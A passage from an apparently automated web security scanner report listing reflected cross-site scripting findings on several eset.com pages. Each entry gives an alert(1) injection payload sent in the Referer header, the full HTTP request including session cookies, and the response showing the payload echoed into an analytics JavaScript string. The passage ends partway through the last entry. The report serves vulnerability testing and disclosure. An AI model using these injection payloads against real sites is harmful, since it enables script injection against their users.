HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Thu, 16-Jun-2011 14:15:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168883
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=a252f"-alert(1)-"980a35ca14f";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.259. http://www.eset.com/us/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c103"-alert(1)-"ae091e76540 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=6c103"-alert(1)-"ae091e76540

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Thu, 16-Jun-2011 14:15:40 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168585
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=6c103"-alert(1)-"ae091e76540";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.260. http://www.eset.com/us/activate [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/activate

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72d6a"-alert(1)-"5798006d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/activate HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=72d6a"-alert(1)-"5798006d14

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11168
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168645
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=72d6a"-alert(1)-"5798006d14";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.261. http://www.eset.com/us/business/products [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171a7"-alert(1)-"728ddbe3c42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/products HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=171a7"-alert(1)-"728ddbe3c42

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168676
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=171a7"-alert(1)-"728ddbe3c42";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.262. http://www.eset.com/us/company [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a378a"-alert(1)-"cc718e60cd8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=a378a"-alert(1)-"cc718e60cd8

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15330
Date: Sun, 17 Apr 2011 12:59:39 GMT
X-Varnish: 1857996636
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>A
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=a378a"-alert(1)-"cc718e60cd8";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.263. http://www.eset.com/us/company/contact [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/contact

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 183b2"-alert(1)-"80f4e4b2bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/contact HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=183b2"-alert(1)-"80f4e4b2bd

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19318
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168711
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>C
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=183b2"-alert(1)-"80f4e4b2bd";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.264. http://www.eset.com/us/company/fun-stuff [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/fun-stuff

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b04f0"-alert(1)-"e90e470ffad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/fun-stuff HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=b04f0"-alert(1)-"e90e470ffad

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13633
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168724
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b04f0"-alert(1)-"e90e470ffad";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.265. http://www.eset.com/us/company/legal-notices [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/legal-notices

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180f9"-alert(1)-"a6eaf5719f2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/legal-notices HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=180f9"-alert(1)-"a6eaf5719f2

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19098
Date: Sun, 17 Apr 2011 14:15:42 GMT
X-Varnish: 1858168772
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=180f9"-alert(1)-"a6eaf5719f2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.266. http://www.eset.com/us/company/privacy-policy [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/privacy-policy

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97d8"-alert(1)-"fbe9f8cd23c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/privacy-policy HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=e97d8"-alert(1)-"fbe9f8cd23c

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25660
Date: Sun, 17 Apr 2011 14:15:42 GMT
X-Varnish: 1858168788
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=e97d8"-alert(1)-"fbe9f8cd23c";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.267. http://www.eset.com/us/download [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d532"-alert(1)-"511703cb891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/download HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=4d532"-alert(1)-"511703cb891

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 121242
Date: Sun, 17 Apr 2011 14:15:53 GMT
X-Varnish: 1858169596
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=4d532"-alert(1)-"511703cb891";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.268. http://www.eset.com/us/download/free-trial [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8efc"-alert(1)-"85ec92afe8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/download/free-trial HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=f8efc"-alert(1)-"85ec92afe8

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16364
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168989
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
